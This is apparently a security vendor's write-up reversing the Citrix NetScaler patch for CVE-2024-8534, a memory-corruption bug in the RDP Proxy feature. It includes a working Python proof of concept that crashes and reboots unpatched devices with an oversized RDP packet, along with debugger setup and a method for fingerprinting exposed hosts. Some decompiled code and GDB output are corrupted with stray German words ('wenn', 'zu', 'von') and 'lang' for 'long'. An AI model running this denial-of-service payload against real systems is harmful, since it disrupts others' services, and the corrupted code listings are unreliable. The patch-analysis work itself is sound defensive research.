It’s been a little while since we last looked at Citrix NetScaler. We’re back this time to look at a patch for yet another memory safety vulnerability. In mid-November this year Citrix released a security bulletin for CVE-2024-8534. The issue appears to exist in the “RDP Proxy” feature and the notes from Citrix mention a denial of service and memory corruption, but not necessarily remote code execution.
Our goal was to reverse the patch and develop a check for our Attack Surface Management platform. However, we also wanted to see if the memory corruption could lead to anything more serious than just denial of service. We were able to confirm the denial of service and track down the fix. However, we were unable to confirm remote code execution. As it stands, running an unpatched Citrix NetScaler with the RDP Proxy feature enabled allows an unauthenticated attacker to remotely force a system restart, leading to a denial of service.
What is RDP Proxy?
For those who are new to Citrix NetScaler, it is a network device providing a number of services such as load balancing, HTTP inspection and remote access VPN. The VPN component is also sometimes referred to on its own as just Citrix Gateway, which can cause some confusion.
For this vulnerability, we are looking at the RDP Proxy feature. RDP Proxy is disabled by default but when it is enabled the feature is used in conjunction with either the VPN or Auth Server services. RDP Proxy allows clients to connect to an RDP server farm through Citrix NetScaler. This gives a little more control over how RDP is authenticated and also avoids requiring a full VPN tunnel to connect with RDP.
The feature works by allowing the user to login to the Citrix Gateway portal and download an RDP connection file containing a session token. When the user opens this RDP file their RDP client will establish an RDP connection to the NetScaler device using the session token to authenticate. NetScaler will then lookup the target RDP server associated with the token and proxy the connection.
Finding the RDP Handler
To see what was patched, we setup two versions of NetScaler, 54.29 (unpatched) and 55.34 (patched). We then copied off the /netscaler/nsppe
binary. This is the NetScaler Packet Processing Engine and it contains a full TCP/IP network stack as well as multiple HTTP services. Nearly all the functionality we care about auditing is typically found here.
We decompiled each version with Ghidra and used the BinExport plugin to generate BinDiff files. Unfortunately, we were greeted with hundreds of functions that were potentially different. Additionally, unlike previous version of NetScaler, function names were now stripped from the binary. Diffing using this approach did not seem like the way forward.
Instead we decided to configure and use the RDP Proxy feature, hoping we could use some information from the requests that were sent to find where in the binary to look. We logged in as a test user and downloaded the RDP connection pack. When connecting with this pack we watched the /var/log/ns.log
file and saw the following message.
Dec 10 04:52:02 <local0.err> 192.168.1.190 12/10/2024:04:52:02 GMT 0-PPE-0 : default RDP Message 151 0 : "[Remote ip = 192.168.1.197:65144][Username = test] Unable to resolve target info 192.168.1.197:3389 - Client:192.168.1.197:65144 - Local:192.168.1.196:443"
We searched for this message in the nsppe
binary and found it in FUN_006c2e10
.
uVar14 = FUN_01ffdce0(
lVar43,0x484,
"[Remote ip = %s:%u][Username = %.*s] Unable to resolve target info %.*s:%d - Client:%s:%d - Local:%s:%d",
uVar20,uVar14 << 8 | uVar14 >> 8,cVar35,local_300,
uVar23,lVar44,uVar15 << 8 | uVar15 >> 8,uVar21,
uVar16 << 8 | uVar16 >> 8,uVar22,
*(ushort *)((lang)param_2 + 10) << 8 |
*(ushort *)((lang)param_2 + 10) >> 8
);
We also found the message in an old decompilation from our previous research that did not strip the function names. We were able to match up the two functions and confirmed that FUN_006c2e10
was the appropriately titled nsaaa_rdp_handler
.
We used the old decompilation to fill in function names as we searched backwards from the call sites for nsaaa_rdp_handler
. We found the following snippet in nsssl_handler
. This function called ns_sslvpn_check_rdpconnect
which then called nsaaa_rdp_handler
.
cVar1 = **(char **)(param_1 + 0xe8);
wenn ((-1 < cVar1) && (cVar1 != '\x16')) {
wenn ((cVar1 == '\x03') && (iVar5 = FUN_006d20b0_ns_sslvpn_check_rdpconnect(param_1,param_2), iVar5 == 0)) {
return 0;
}
_DAT_03162e18 = _DAT_03162e18 + 1;
FUN_0208c230(*(undefined8 *)(param_1 + 0x90),0);
FUN_01bb9950(param_1,0x420);
return 0;
}
Here we found that the RDP handling routines are only invoked if the first character of the request is \x03
. This is the first byte of an RDP packet and explained how NetScaler switched between RDP and HTTP on the same port. If the RDP Proxy feature is disabled, requests starting with this byte are immediately dropped and the connection is reset.
Triggering a Crash
We used Wireshark and these three protocol documents to write a short Python script that we could use to send RDP Connection Requests and manually tweak some of the parameters.
#!/usr/bin/env python3
import socket
x224Crq = b"^\xe0\x00\x00\x00\x00\x00"
cookie = b"Cookie: mstshash=IDENTIFIER\r\n"
rdpNegotiateRequest = b"\x01\x02\x08\x00\x00\x00\x00\x00"
payload = x224Crq + cookie + rdpNegotiateRequest
tpktHeader = b"\x03\x00" + (len(payload)+4).to_bytes(2, 'big')
req = tpktHeader + payload
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.196", 443))
sock.sendall(req)
print(sock.recv(1024))
We found that NetScaler ignored nearly all the fields except the request length which it would use to determine if it needed to read more data and either a cookie or a “STA Ticket” that it would use for authentication. The rest of the request did not need to conform to the protocol as it did not appear to be parsed at all.
We found two cookies mentioned in the RDP specification. One is a field labeled “cookie” and it looks like an HTTP header, Cookie: mstshash=username
. The other is unhelpfully labelled “routingToken”, but is very similar, for example: Cookie: msts=3640205228.15629.0000
. We found that NetScaler only searched for the “routingToken” version of this field. While we tried different values and lengths for this line, we found they were all handled without issue.
The other field was a “STA Ticket”, this appeared to be a custom Citrix service called the “Secure Ticket Authority”. We looked online and found some examples of the ticket and it appeared to be a semicolon-delimited string, for example: ;10;STA01;FE0A7B2CE2E77DDC17C7FD3EE7959E79
. Again, we fuzzed this field but any errors in the format were always handled gracefully.
We moved on to fuzzing the packet header, sending very large requests, multiple requests in the same connection and repeated requests in quick succession. We did eventually get a crash which we then shrunk down to the following (perhaps underwhelming) payload:
#!/usr/bin/env python3
import socket
payload = b"A"*4000
tpktHeader = b"\x03\x00" + (len(payload)+4).to_bytes(2, 'big')
req = tpktHeader + payload
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.196", 443))
sock.sendall(req)
print(sock.recv(1024))
In the end, the simplest payload was all we really needed to do. However, fuzzing the cookies and tickets still gave us a good idea of how the RDP Proxy feature worked and what NetScaler was doing to process these packets. Next we had to inspect the crash and see if we could determine where the memory corruption was occurring.
Setting Up a Debugger
Debugging NetScaler has always been non-trivial. As nsppe
is responsible for the network stack we cannot debug it over SSH because pausing execution will pause packet processing and halt the SSH session. Since we ran NetScaler in a VM we were limited to the VMware console window. This was a less than brilliant experience, the lack of scrolling and copy / paste being the two biggest issues.
Previously we used remote GDB over a serial port. However, this time we encountered issues. We suspect there was a mismatch between the protocol our GDB client was using and the one the server was sending. This happened last time too, but was solved by compiling a matching version of GDB. For whatever reason, that approach did not work this time. So instead of dealing with the frustrations of remote GDB, we decided to fix the console experience.
We started by adding a serial port like the one used for remote GDB. This was done by adding the following snippet to the vmx
file of our VM. This would map a serial port inside the VM to TCP port 12345 on our host machine.
serial0.fileType = "network"
serial0.fileName = "telnet://:12345"
serial0.present = "TRUE"
Inside NetScaler, via the VMware console, we ran the following command to setup a new tty on that serial port, /dev/cuau0.
root@ns# getty xterm cuau0
We could then connect with telnet and get the normal shell experience but in our own terminal. This meant we would have full access to scroll back and copy / paste.
$ telnet localhost 12345
Trying ::1...
Connected to localhost.
Escape character is '^]'.
��root�
Password:
Done
> shell
root@ns#
To properly debug nsppe
, we had to first stop the pitboss
service. This program periodically checks in with nsppe
and if it doesn’t get a response, nsppe
is restarted. Since we don’t want our program to restart while paused in the debugger, we suspended pitboss
by attaching GDB and leaving it in the background.
root@ns# ps aux | grep pitboss
root 27 0.0 0.8 13528 13628 - S 05:56 0:00.11 nspitboss (pitboss)
root@ns# gdb -p 27 &
[1] 2598
...
[1]+ Stopped gdb -p 27
root@ns#
We could then attach GDB to nsppe
and inspect the crash.
root@ns# ps aux | grep nsppe
root 1551 100.0 42.1 711104 699712 - Rs 05:58 13:52.93 nsppe (NSPPE-00)
root@ns# gdb -p 1551
...
Attaching to process 1551
Reading symbols from /netscaler/nsppe...
(No debugging symbols found in /netscaler/nsppe)
[Switching zu LWP 100192 von process 1551]
0x000000000206bf16 in ?? ()
(gdb) c
Continuing.
Program received signal SIGBUS, Bus error.
0x0000000001dd8a6d in ?? ()
Debugging the Crash
Determining the root cause of the crash was a difficult task. Each crash forced the VM to reboot which would take roughly thirty seconds, this made it slow to iterate through possible causes. The crash was always a bad pointer dereference and would sometimes occur within nsaaa_rdp_handler
but not every time. If we look at the crash from the previous section we can see nsaaa_rdp_handler
still in the call stack.
Program received signal SIGBUS, Bus error.
0x0000000001dd8a6d in ?? ()
(gdb) bt
#0 0x0000000001dd8a6d in ?? ()
#1 0x000000000145fdcc in ?? ()
#2 0x00000000013b1e3a in ?? ()
#3 0x00000000013bfc6d in ?? ()
#4 0x00000000013afd76 in ?? ()
#5 0x00000000006c9519 in ?? () <- nsaaa_rdp_handler
#6 0x0000000002085a8f in ?? ()
#7 0x00000000016fca87 in ?? ()
#8 0x0000000002087717 in ?? ()
#9 0x00000000020762ba in ?? ()
#10 0x0000000002073281 in ?? ()
#11 0x000000000206c4bc in ?? ()
#12 0x000000000206c259 in ?? ()
#13 0x000000000170cd2f in ?? ()
#14 0x000000000170cbc2 in ?? ()
#15 0x0000000001baa662 in ?? ()
#16 0x0000000001ba9c9d in ?? ()
#17 0x000000000040039b in ?? ()
#18 0x0000000000000000 in ?? ()
Looking at the registers we saw part of our payload had found its way into rax
and the write to this location in memory caused a fault.
(gdb) x/i $rip
=> 0x1dd8a6d: mov QWORD PTR [rax],rcx
(gdb) x/i $rax
0x414141414141416b: Cannot access memory at address 0x414141414141416b
The example above is just one of many locations where the fault occurred. It was random at which location the execution would halt and there was a lot of code to step through between the initial request processing and the crash. In an attempt to narrow down our search, we took another look at a text diff between the patched and unpatched nsaaa_rdp_handler
. A lot of the code had been rearranged, but was functionally the same. However, we were able to identify a small check added to ensure a variable was less than 512.
// unpatched
uVar14 = *(ushort *)(*(char **)(param_1 + 0xe8) + 2); // take two bytes from param_1
uVar14 = uVar14 << 8 | uVar14 >> 8; // swap the two bytes
param_2[0xbc] = (uint)uVar14; // save value to param_2
puVar41 = *(undefined4 **)(param_2 + 0x11e);
wenn (*(ushort *)(param_1 + 0xf2) < uVar14) {
// patched
uVar14 = *(ushort *)(*(char **)(param_1 + 0xe8) + 2); // take two bytes from param_1
uVar14 = uVar14 << 8 | uVar14 >> 8; // swap the two bytes
param_2[0xbc] = (uint)uVar14; // save value to param_2
wenn (0x200 < uVar14) { // if value is less than 512, jump to cleanup
_DAT_036cfe40 = _DAT_036cfe40 + 1;
FUN_009d6770(param_2,0x11f);
goto LAB_006c67d2;
}
puVar41 = *(undefined4 **)(param_2 + 0x11e);
wenn (*(ushort *)(param_1 + 0xf2) < uVar14) {
The two byte swap was conspicuous because the request header had a two byte length field in big endian order that would need byte swapping. We set a breakpoint at this location and saw that the variable contained the length of our request.
(gdb) b *0x006c38ae
Breakpoint 1 at 0x6c38ae
(gdb) c
Continuing.
Breakpoint 1, 0x00000000006c38ae in ?? ()
(gdb) print $ecx
$1 = 4004 // our 4000 byte payload + 4 byte header
(gdb)
It seemed likely that this was how the issue was patched. However, this check didn’t provide much help tracking down where the memory corruption occurred as there was still a lot of processing done after where this check would have been in the unpatched version.
Out of Time
Unfortunately, this was also where we ran out of time to continue digging. The advisory from Citrix stated that this was a denial of service and memory corruption and that appears consistent with our findings. The corrupted memory always appeared in a dynamically allocated block and not the call stack. This means that if code execution was possible, it is unlikely to be trivial. None of the crashes we investigated had an immediately obvious path to code execution, however we weren’t able to verify all code paths back from the crash. We were also unable to determine at what point too much memory was read or written to based on the request length.
What Did We Learn?
It’s a bit disappointing that we were unable to track down an exact root cause for this vulnerability, but sometimes that’s the case. Fortunately, we were able to uncover a bit more about how NetScaler is configured and how it operates. As well as setup some good debugging tooling for the next time one of these issues appears.
Along the way we were able to reliably fingerprint if a host had the RDP Proxy feature enabled. We did this by sending RDP negotiate packets and monitoring the response. If RDP Proxy was enabled and a request was sent specifying a length longer than what was provided the connection would wait for the rest of the packet, indicating RDP was being processed. If RDP Proxy was disabled the connection would be terminated immediately. By combining this with a version check we were able to provide our customers with a good indicator of whether or not they may be exposed to the denial of service without causing any actual service disruption.
As a part of our True Attack Surface Management platform, our Security Researchers designed a comprehensive check for this issue without causing disruption while maintaining high accuracy. This check provided our customers with the ability to rapidly respond to this vulnerability across their Citrix NetScaler assets.
As always, customers of our Attack Surface Management platform have been notified for the presence of this vulnerability. We continue to perform original security research in an effort to inform our customers about zero-day and N-day vulnerabilities in their attack surface.